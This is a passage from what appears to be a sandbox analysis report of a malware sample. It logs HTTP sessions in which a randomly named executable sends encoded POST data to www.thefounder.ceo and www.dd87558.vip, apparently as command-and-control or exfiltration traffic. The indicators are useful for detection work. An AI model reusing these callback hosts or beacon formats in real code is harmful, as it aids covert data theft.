                                            Data Raw: 35 30 35 78 4f 6a 34 3d 66 75 33 73 69 54 4a 63 4f 39 49 4c 50 48 4d 77 71 32 64 62 51 57 6e 6c 35 56 44 35 63 61 36 39 56 6d 53 6c 58 69 52 6d 49 36 33 6b 4a 32 73 4d 2f 74 7a 47 77 2b 4b 70 75 58 43 2b 2b 67 4a 62 45 39 78 6f 55 33 6e 4d 37 78 50 69 49 76 77 77 4b 4c 59 2b 68 73 4e 56 49 4f 57 70 55 56 66 41 62 2b 4c 4a 6d 55 51 57 6f 73 31 4b 76 53 6e 44 33 31 6e 51 56 43 65 6e 74 4f 4e 49 44 69 67 5a 44 74 55 69 56 34 50 32 4a 4d 6d 2b 64 59 41 53 45 30 45 42 59 52 48 52 51 6b 63 57 6c 6b 75 70 4f 5a 45 4b 32 74 79 67 47 6a 6d 38 57 39 38 67 42 75 4b 75 73 5a 58 6b 69 41 33 4c 30 73 6c 4d 74 6b 44 38 6c 70 73 3d
                                            Data Ascii: 505xOj4=fu3siTJcO9ILPHMwq2dbQWnl5VD5ca69VmSlXiRmI63kJ2sM/tzGw+KpuXC++gJbE9xoU3nM7xPiIvwwKLY+hsNVIOWpUVfAb+LJmUQWos1KvSnD31nQVCentONIDigZDtUiV4P2JMm+dYASE0EBYRHRQkcWlkupOZEK2tygGjm8W98gBuKusZXkiA3L0slMtkD8lps=
                                            Mar 2, 2025 12:03:59.785804987 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.5499843.33.130.190804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:01.869292974 CET859OUTPOST /je5x/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.thefounder.ceo
                                            Cache-Control: max-age=0
                                            Content-Length: 228
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.thefounder.ceo
                                            Referer: http://www.thefounder.ceo/je5x/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 66 75 33 73 69 54 4a 63 4f 39 49 4c 50 6b 55 77 6f 56 46 62 56 32 6e 71 32 31 44 35 56 36 37 30 56 6d 57 6c 58 6d 4a 32 49 49 54 6b 49 58 63 4d 77 49 48 47 33 2b 4b 70 32 48 43 37 6a 51 4a 51 45 39 39 4b 55 79 48 4d 37 78 62 69 49 76 67 77 4b 34 77 39 69 63 4e 58 63 2b 57 72 5a 31 66 41 62 2b 4c 4a 6d 55 55 38 6f 74 52 4b 76 44 58 44 33 58 44 54 62 69 65 34 71 4f 4e 49 53 79 67 64 44 74 56 48 56 35 69 5a 4a 4f 75 2b 64 5a 77 53 45 6e 63 47 42 68 48 58 54 55 63 64 68 45 66 68 49 62 34 59 38 72 2f 63 66 69 53 57 54 4c 4e 4b 62 4d 43 47 2f 35 37 63 79 54 2f 38 6c 63 45 6c 33 48 54 4d 37 2b 37 43 6e 41 51 67 4e 6c 6b 48 4e 55 51 69 77 53 77 4f 46 61 65 53
                                            Data Ascii: 505xOj4=fu3siTJcO9ILPkUwoVFbV2nq21D5V670VmWlXmJ2IITkIXcMwIHG3+Kp2HC7jQJQE99KUyHM7xbiIvgwK4w9icNXc+WrZ1fAb+LJmUU8otRKvDXD3XDTbie4qONISygdDtVHV5iZJOu+dZwSEncGBhHXTUcdhEfhIb4Y8r/cfiSWTLNKbMCG/57cyT/8lcEl3HTM7+7CnAQgNlkHNUQiwSwOFaeS
                                            Mar 2, 2025 12:04:02.423090935 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.5499853.33.130.190804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:04.417736053 CET1876OUTPOST /je5x/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.thefounder.ceo
                                            Cache-Control: max-age=0
                                            Content-Length: 1244
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.thefounder.ceo
                                            Referer: http://www.thefounder.ceo/je5x/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 66 75 33 73 69 54 4a 63 4f 39 49 4c 50 6b 55 77 6f 56 46 62 56 32 6e 71 32 31 44 35 56 36 37 30 56 6d 57 6c 58 6d 4a 32 49 49 62 6b 4a 6c 55 4d 2f 4c 76 47 32 2b 4b 70 36 6e 43 36 6a 51 4a 33 45 39 31 4f 55 79 61 75 37 79 6a 69 49 4a 73 77 64 5a 77 39 31 73 4e 58 44 75 57 6d 55 56 65 49 62 36 6e 56 6d 55 45 38 6f 74 52 4b 76 41 50 44 77 46 6e 54 5a 69 65 6e 74 4f 4e 45 44 69 67 6c 44 74 63 36 56 35 6d 7a 4a 2b 4f 2b 64 35 67 53 44 56 45 47 65 52 48 56 57 55 64 64 68 45 54 75 49 66 59 55 38 72 6a 69 66 6c 2b 57 52 65 30 38 4c 2b 2b 6d 69 34 4f 6b 33 7a 7a 79 31 4d 4a 43 32 57 33 41 36 76 66 47 76 68 51 30 4d 41 30 6e 48 51 42 4f 75 7a 34 55 42 73 2f 79 68 41 37 67 59 69 74 49 6a 66 39 69 2b 79 79 50 4d 51 66 77 57 45 50 78 73 76 2f 65 76 63 6b 47 77 4a 74 68 38 36 74 2f 6d 32 31 79 70 69 48 50 64 57 50 43 55 30 43 48 59 6a 52 50 6b 6a 5a 64 6b 70 67 6e 71 66 48 77 51 79 4a 67 72 4f 4f 34 71 73 6c 49 43 72 66 67 38 4d 49 72 67 56 79 76 57 4f 65 63 66 68 7a 2b 5a 58 4e 39 6b 31 [TRUNCATED]
                                            Data Ascii: 505xOj4=fu3siTJcO9ILPkUwoVFbV2nq21D5V670VmWlXmJ2IIbkJlUM/LvG2+Kp6nC6jQJ3E91OUyau7yjiIJswdZw91sNXDuWmUVeIb6nVmUE8otRKvAPDwFnTZientONEDiglDtc6V5mzJ+O+d5gSDVEGeRHVWUddhETuIfYU8rjifl+WRe08L++mi4Ok3zzy1MJC2W3A6vfGvhQ0MA0nHQBOuz4UBs/yhA7gYitIjf9i+yyPMQfwWEPxsv/evckGwJth86t/m21ypiHPdWPCU0CHYjRPkjZdkpgnqfHwQyJgrOO4qslICrfg8MIrgVyvWOecfhz+ZXN9k1od8tGwXKelttU60FQObJmBZDpOnwfq/4wKwWlAvLWV3fAIeP8Ne0xxKIIIuDaMIjK9r4be9QI/K+60DBNymTMcqzPtGwTCXyFesfA55tQVA0GHUWH8cIU2L3cIwqtkoGwGEZGsuYTXKthmKDYlWiELfGi6NpfMDzyC3lXYiY3al5ko/Sd9CnivvdN1Mxjtl477fBWkzQ+tCsuMzXTmgrpehAg97uBZ136lqjz6zy3TMAhltKHDnoy9Wg+16oaW7JvJiKqxEfQZ7V+/wpNVNZaO28LLc6IhH8ZNKA7FZvyt6+fl4L49MSIMg//YTVe2tdgJcgWeQ7meKwSu/wsLAuuUQvUZSqvxcnm83N52t+68VMLGw5nxwhX4/UkyArPubX+WCjLbN/OEqMRN6Hc7ta5dVyLD67RmPaEaYm2EaXtP53xzjv3eco5PrbYjqc8qu3jqRjU0jgYmglyMaqgxWWq7IvnPQYRCviw/P530Je7Hj90jM7b4TsI49ITAdfTg+6WiEqJtacuxhKWoc+kYzLEkSYuZWZmvk/dMjSowMRwfJTyFcaNF3wgKjhya8TaaALfjG53NiSrjsMhu+ubIbOZuSlrbrJaPzbyGcm1QTKs7DWjLogtLuhi/ZC19MAgbG0mQISdV9G0sI/1fx1C9btv5EEvRp5RRUaqC [TRUNCATED]
                                            Mar 2, 2025 12:04:04.932231903 CET73INHTTP/1.1 405 Method Not Allowed
                                            content-length: 0
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.5499863.33.130.190804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:06.961466074 CET583OUTGET /je5x/?505xOj4=SsfMhk4dJssrOiNp2G01dlzI+k/eTbfsdjnjc1R6LZ/pW30W4rr7y9ry7X+UgyNXNMtIRXvZ5DXQMf4LLsE11oRVNvKdTWL9WtrriEIGgs1R8zfOom7pbjefjfwzTRhqcA==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.thefounder.ceo
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Mar 2, 2025 12:04:07.466578960 CET397INHTTP/1.1 200 OK
                                            content-type: text/html
                                            date: Sun, 02 Mar 2025 11:04:07 GMT
                                            content-length: 276
                                            connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 30 35 78 4f 6a 34 3d 53 73 66 4d 68 6b 34 64 4a 73 73 72 4f 69 4e 70 32 47 30 31 64 6c 7a 49 2b 6b 2f 65 54 62 66 73 64 6a 6e 6a 63 31 52 36 4c 5a 2f 70 57 33 30 57 34 72 72 37 79 39 72 79 37 58 2b 55 67 79 4e 58 4e 4d 74 49 52 58 76 5a 35 44 58 51 4d 66 34 4c 4c 73 45 31 31 6f 52 56 4e 76 4b 64 54 57 4c 39 57 74 72 72 69 45 49 47 67 73 31 52 38 7a 66 4f 6f 6d 37 70 62 6a 65 66 6a 66 77 7a 54 52 68 71 63 41 3d 3d 26 46 7a 5f 3d 71 48 45 74 62 62 39 30 74 4c 6a 54 4e 30 78 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?505xOj4=SsfMhk4dJssrOiNp2G01dlzI+k/eTbfsdjnjc1R6LZ/pW30W4rr7y9ry7X+UgyNXNMtIRXvZ5DXQMf4LLsE11oRVNvKdTWL9WtrriEIGgs1R8zfOom7pbjefjfwzTRhqcA==&Fz_=qHEtbb90tLjTN0x0"}</script></head></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.549987104.21.80.1804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:12.510289907 CET830OUTPOST /uoki/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dd87558.vip
                                            Cache-Control: max-age=0
                                            Content-Length: 208
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dd87558.vip
                                            Referer: http://www.dd87558.vip/uoki/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 73 54 56 30 4e 69 37 35 57 35 79 43 51 63 6e 6b 34 39 57 76 52 34 5a 4d 4f 48 50 49 2b 45 38 69 52 39 57 74 34 63 30 38 47 6e 59 66 70 52 6f 4c 4d 46 64 78 55 4d 78 52 43 59 7a 59 32 67 42 52 62 54 37 38 6a 69 48 5a 6a 41 57 6d 78 43 30 48 6f 33 37 71 54 54 79 34 62 2f 4e 72 5a 5a 7a 57 76 4c 32 5a 4b 49 48 76 69 52 6c 47 30 70 4a 42 30 65 70 6f 6a 48 38 56 6c 6c 31 4f 43 4a 5a 37 69 38 30 76 76 49 39 55 4e 50 32 2b 54 34 62 4a 39 63 38 6d 68 2f 6d 62 73 4b 51 47 53 50 6b 37 4a 75 46 5a 50 57 44 7a 74 68 4b 71 73 64 6b 2b 6b 47 55 39 30 51 4c 61 41 67 6a 76 34 48 4a 6b 47 7a 64 6d 2f 34 34 3d
                                            Data Ascii: 505xOj4=sTV0Ni75W5yCQcnk49WvR4ZMOHPI+E8iR9Wt4c08GnYfpRoLMFdxUMxRCYzY2gBRbT78jiHZjAWmxC0Ho37qTTy4b/NrZZzWvL2ZKIHviRlG0pJB0epojH8Vll1OCJZ7i80vvI9UNP2+T4bJ9c8mh/mbsKQGSPk7JuFZPWDzthKqsdk+kGU90QLaAgjv4HJkGzdm/44=
                                            Mar 2, 2025 12:04:13.384954929 CET1236INHTTP/1.1 405 Not Allowed
                                            Date: Sun, 02 Mar 2025 11:04:13 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LICb0ZL5ILCRDAxvN7FJyfVxO7koZPWgMdECKNd5RTzgESt%2BduZ9wr8EAfXEPLqP9KivJZK7Qcmt%2BjyynCzymcUfs9txyhLpBymAkJyHbe93Tho7DetREmX0b9Nsi8lbYU%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 91a06978aa6043ee-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                            Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                            Mar 2, 2025 12:04:13.385030031 CET96INData Raw: 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67
                                            Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.549988104.21.80.1804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:15.062973976 CET850OUTPOST /uoki/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dd87558.vip
                                            Cache-Control: max-age=0
                                            Content-Length: 228
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dd87558.vip
                                            Referer: http://www.dd87558.vip/uoki/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 73 54 56 30 4e 69 37 35 57 35 79 43 43 70 33 6b 36 63 57 76 54 59 5a 50 4c 48 50 49 72 30 38 6d 52 39 61 74 34 65 59 73 48 52 67 66 70 31 73 4c 43 67 78 78 52 4d 78 52 4e 34 7a 64 34 41 42 61 62 54 33 4f 6a 6a 4c 5a 6a 41 43 6d 78 44 45 48 70 41 58 70 53 44 79 2b 43 76 4e 70 45 4a 7a 57 76 4c 32 5a 4b 49 53 49 69 52 39 47 30 5a 35 42 31 2f 70 76 67 48 38 57 6b 6c 31 4f 54 35 5a 2f 69 38 30 4e 76 4d 6c 75 4e 4e 2b 2b 54 38 58 4a 39 4e 38 6c 72 2f 6d 56 78 61 52 5a 54 36 4a 57 51 39 68 4a 50 30 32 36 74 78 4b 32 67 4c 56 55 2b 6b 63 56 6e 77 6e 69 51 7a 72 59 70 33 6f 4e 63 51 4e 57 68 76 74 54 62 6e 74 38 48 2f 47 72 53 4c 77 75 6f 58 4b 70 41 37 73 42
                                            Data Ascii: 505xOj4=sTV0Ni75W5yCCp3k6cWvTYZPLHPIr08mR9at4eYsHRgfp1sLCgxxRMxRN4zd4ABabT3OjjLZjACmxDEHpAXpSDy+CvNpEJzWvL2ZKISIiR9G0Z5B1/pvgH8Wkl1OT5Z/i80NvMluNN++T8XJ9N8lr/mVxaRZT6JWQ9hJP026txK2gLVU+kcVnwniQzrYp3oNcQNWhvtTbnt8H/GrSLwuoXKpA7sB
                                            Mar 2, 2025 12:04:16.022646904 CET1236INHTTP/1.1 405 Not Allowed
                                            Date: Sun, 02 Mar 2025 11:04:15 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z92IyA6eQs07g%2Fkd3Gf5v3vGKPOs3Q9zCOnjcVgX4822jnQMvPdlre22qLCzEOKkXIUhr5RMzyZRhsx46CLoxbs%2FYaluNGE5BVkcng87H4mIMd4jF1ZM1WcqnTbYR%2FYfXxs%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 91a06988efbbc443-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=20442&min_rtt=20442&rtt_var=10221&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=850&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                            Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chro
                                            Mar 2, 2025 12:04:16.022728920 CET102INData Raw: 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72
                                            Data Ascii: me friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.549989104.21.80.1804428C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe
                                            TimestampBytes transferredDirectionData
                                            Mar 2, 2025 12:04:17.641733885 CET1867OUTPOST /uoki/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.dd87558.vip
                                            Cache-Control: max-age=0
                                            Content-Length: 1244
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Origin: http://www.dd87558.vip
                                            Referer: http://www.dd87558.vip/uoki/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
                                            Data Raw: 35 30 35 78 4f 6a 34 3d 73 54 56 30 4e 69 37 35 57 35 79 43 43 70 33 6b 36 63 57 76 54 59 5a 50 4c 48 50 49 72 30 38 6d 52 39 61 74 34 65 59 73 48 52 6f 66 70 41 34 4c 4e 6e 46 78 53 4d 78 52 54 49 7a 63 34 41 42 48 62 54 76 77 6a 6a 33 6e 6a 43 36 6d 78 67 4d 48 68 55 44 70 48 54 79 2b 66 2f 4e 6f 5a 5a 7a 44 76 4c 6d 64 4b 49 43 49 69 52 39 47 30 62 52 42 32 75 70 76 74 6e 38 56 6c 6c 31 34 43 4a 5a 48 69 39 64 76 76 4d 70 2b 4e 38 65 2b 54 59 37 4a 37 2f 55 6c 32 50 6d 58 77 61 52 52 54 36 4e 56 51 39 4e 46 50 77 32 51 74 7a 4b 32 6b 71 4d 31 35 55 4d 78 6c 54 47 50 44 78 2f 70 7a 68 41 34 62 57 31 59 2b 73 56 30 52 45 49 52 41 34 4f 33 58 50 4e 57 79 77 53 71 49 4d 46 65 61 52 6c 79 76 4e 64 5a 72 31 57 35 55 79 57 66 53 4e 47 65 58 38 74 35 79 4e 57 70 4b 69 32 59 76 79 31 67 49 6e 69 59 49 6d 55 51 41 57 63 37 6a 6b 63 6d 31 74 6d 49 5a 6b 43 4f 56 67 4c 72 7a 64 4c 76 53 55 6a 4b 4c 33 59 2b 76 35 61 52 4b 4d 41 78 58 45 63 6d 4a 65 4c 30 70 55 54 59 6f 6d 35 52 4f 43 50 48 54 50 55 4d 6c 30 [TRUNCATED]
                                            Data Ascii: 505xOj4=sTV0Ni75W5yCCp3k6cWvTYZPLHPIr08mR9at4eYsHRofpA4LNnFxSMxRTIzc4ABHbTvwjj3njC6mxgMHhUDpHTy+f/NoZZzDvLmdKICIiR9G0bRB2upvtn8Vll14CJZHi9dvvMp+N8e+TY7J7/Ul2PmXwaRRT6NVQ9NFPw2QtzK2kqM15UMxlTGPDx/pzhA4bW1Y+sV0REIRA4O3XPNWywSqIMFeaRlyvNdZr1W5UyWfSNGeX8t5yNWpKi2Yvy1gIniYImUQAWc7jkcm1tmIZkCOVgLrzdLvSUjKL3Y+v5aRKMAxXEcmJeL0pUTYom5ROCPHTPUMl0ZttMPcWZqVmY68WId/NBy6YGkkA0R8I60kkJHPreUzHCB131RuMtAsY1qCAa/wYYvIg08dvdzUSWCxSj0/76PNvtUMvHC27cXs6FZCBG1I2eivl4dLHXPfQE3M4kf+lg2Jw2lcEnhaL2AW2hZXNKUizNfBcU+t9ifllkm131IK/Wxmor0e6voTxyRk10uhcx7RnuB5z2WxZ8lORSK2dtsf65LflATjMaDFMUbQ4trXd7/YMMc3ziA30aoKJYmBq4py91fQjQ8g8bp79r0VwLni/jHJhZHlBV+pvp5nLmTZLEScEnkFguCV/BmAhOVsSsEByDcc9uNnWk2uLRrJfe+i/cnfdSuotixQQe9rJk4G63yMHfp/MAS50kPJMO318sgUOlx+cL+E8bVPslouK3fuj3TMx4xmRKHHm8jdmw6y913WPm8C1zBzxTrmHjuE5Rj/oJRwQ7lgXg/A/fXVVyGaKpPRzw468Qv1o8E2nLowsixnJ/uRgDY3/itvkFfc0NqzT3ZUEDkqhdkTGlS7L4MDmsRu+i+UgTOgIIGrs1QYxnXOR9by2d9VK0CVEFWNcNE7zsKucFte09HKOBZ/HU7RHEi0NcIIRh5smV5MQ+lam+mXR0nhMlr4Jy+ja1EzCKgB3oyQBLLbE5Nc9dyH3hNmjLlE4nUVUspa [TRUNCATED]
                                            Mar 2, 2025 12:04:18.575109005 CET1236INHTTP/1.1 405 Not Allowed
                                            Date: Sun, 02 Mar 2025 11:04:18 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
